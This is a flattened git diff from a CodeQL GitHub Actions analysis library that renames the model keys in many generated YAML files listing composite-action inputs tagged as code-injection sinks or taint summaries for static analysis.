-1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index e8d0cc64792..5431aad8dca 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index 736c84b68cc..92c23f9f1fb 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index 062203945c5..52654194d81 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index aedeb4e1023..43c274aa033 100644 
--- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index 0d8afb086c9..7f8b87fa20e 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] - ["gravitational/teleport", "*", "input.attempts", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index 4756acbf306..31422a708c5 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index a0e4acec75a..30ccfdea631 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index 6acfcf9773f..9bc22ac93ef 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] - ["hashicorp/terraform", "*", "input.target-terraform-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index 7e0deeea906..4ec47cb3975 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] - ["hashicorp/vault", "*", "input.vault-binary-path", "output.vault-binary-path", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index 18678fe9ecd..81d137ce547 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] - ["home-assistant/android", "*", "input.lokalise-project", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index d9d492f79cd..79675d59c05 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] - ["homebrew/actions", "*", "input.formulae", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index d3046ff1fc4..3310a67347c 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index 845fba40a6c..d12963b43db 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] - ["hyperledger/fabric-samples", "*", "input.fabric-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index bcf51805710..1c63a9e6d0f 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] - ["igniterealtime/openfire", "*", "input.ip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index e1ff1fa3497..e120de812c4 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index 4c5ef712e58..1be37285c9e 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] - ["inspektor-gadget/inspektor-gadget", "*", "input.registry", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index 31e1f562877..aa6e9b684d0 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index 298ba1ccbe3..221aa83de0b 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] - ["ionic-team/ionic-framework", "*", "input.shard", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 0dc57625890..71007932427 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] - ["ionic-team/ionicons", "*", "input.output", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index c6fc16750f8..bff13b29ecc 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] - ["ionic-team/stencil", "*", "input.output", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index 0cbbd38d428..1f75dd81c04 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] - ["ipfs/aegir", "*", "input.docker-username", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index acc6cb91c07..15604c34a17 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index c59e989db04..aef7f4f6242 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "input.application-packaging", "code-injection", "generated"] @@ -22,6 +22,6 @@ extensions: - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index b426dfb250d..f3a26e867ec 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index 4a0c3c2d30f..4feab5714c7 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] - ["juicedata/juicefs", "*", "input.storage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 74d0ef69f75..3030f81072a 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] - ["jupyter/docker-stacks", "*", "input.image", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index ac8762d24ea..7f8885d1ec7 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] - ["keycloak/keycloak", "*", "input.jobs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 6df9a160ec5..93e6b1e0312 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] - ["kserve/kserve", "*", "input.deployment-mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 0c2793028a0..5284159e9db 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] - ["kubeflow/katib", "*", "input.database-type", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index f5bdc3d4bcc..ac8b8a5150a 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 161022b8cbe..19e9448994e 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 391b1917029..82c5713f943 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 3a45707d59e..2d4108331b9 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] - ["kubescape/kubescape", "*", "input.SUB_STRING", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index c2e3608f745..ccd49962fa4 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] - ["kubeshop/botkube", "*", "input.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index 9b8e9d1e7ed..a7e56c8626d 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] - ["kyverno/kyverno", "*", "input.sbom-name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 954f2c34661..4c0df425e45 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] - ["lancedb/lance", "*", "input.vcpkg_token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index 31cb8acad9e..a69f2303dbe 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index 4c8df154d8e..c2c87969e93 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] - ["layer5labs/meshmap-snapshot", "*", "input.mesheryToken", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index 8366d5119ae..c1c3bf433cd 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] - ["ldc-developers/ldc", "*", "input.build_targets", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index a5d99cfc5e0..af21dca8205 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] - ["ledgerhq/ledger-live", "*", "input.turborepo-server-port", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index e07d26e6a5f..18fdeffe1ec 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index 3fe7b27d9d5..ee67e882174 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] - ["lf-edge/eve", "*", "input.dockerhub-account", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 664c28bfc55..49caeb5f1dc 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] - ["libgit2/libgit2", "*", "input.container-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index 7b90ed20234..dda74b285da 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] - ["lightning-ai/pytorch-lightning", "*", "input.pkg-folder", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index 62b31c2d3ef..4b144103f8f 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] - ["lightning-ai/torchmetrics", "*", "input.torch-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 427b75730ab..931658c0bb5 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "input.docker-registry", "code-injection", "generated"] @@ -9,7 +9,7 @@ extensions: - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] - ["linkerd/linkerd2", "*", "input.tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index 441913730fa..f2963217662 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml 
